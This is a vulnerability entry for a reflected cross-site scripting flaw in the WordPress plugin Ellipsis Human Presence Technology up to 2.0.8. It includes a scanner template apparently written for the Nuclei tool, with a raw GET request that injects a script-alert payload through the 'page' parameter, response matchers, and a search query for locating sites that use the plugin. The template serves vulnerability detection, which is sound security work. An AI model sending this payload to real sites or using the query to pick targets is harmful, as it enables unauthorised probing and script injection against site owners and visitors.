漏洞描述
The 'page' GET parameter of the inc/protected-forms-table.php file was affected by a reflected XSS vulnerability.
wp-ellipsis-xss: Ellipsis Human Presence Technology <= 2.0.8 - Cross Site Scripting
PoC代码[已公开]
id: wp-ellipsis-xss
info:
name: Ellipsis Human Presence Technology <= 2.0.8 - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
The 'page' GET parameter of the inc/protected-forms-table.php file was affected by a reflected XSS vulnerability.
reference:
- https://wpscan.com/vulnerability/c0a138d8-93ac-463c-b650-d849352c0b44
- https://packetstormsecurity.com/files/154393/
- https://wordpress.org/plugins/ellipsis-human-presence-technology/
metadata:
verified: true
max-request: 1
publicwww-query: "/wp-content/plugins/ellipsis-human-presence-technology/"
tags: wpscan,packetstorm,wordpress,wp-plugin,ellipsis-human-presence-technology,xss,vuln
http:
- raw:
- |
GET /wp-content/plugins/ellipsis-human-presence-technology/inc/protected-forms-table.php?&page=%22%20%3E%3Cscript%3Ealert(document.location)%3C/script%3E HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<script>alert(document.location)</script>'
- '<form id="protected-forms-table"'
condition: and
- type: word
part: header
words:
- "text/html"
# digest: 4a0a004730450220232f1292267050552bac2fa4fb28045b1af4fa62ded83ff73bce671532c3bb2d022100bd89d3acfad55c8bd5f96c0f381f77b8b498839171ea9f63e6061e9f33827f79:922c64590222798bb761d5b6d8e72950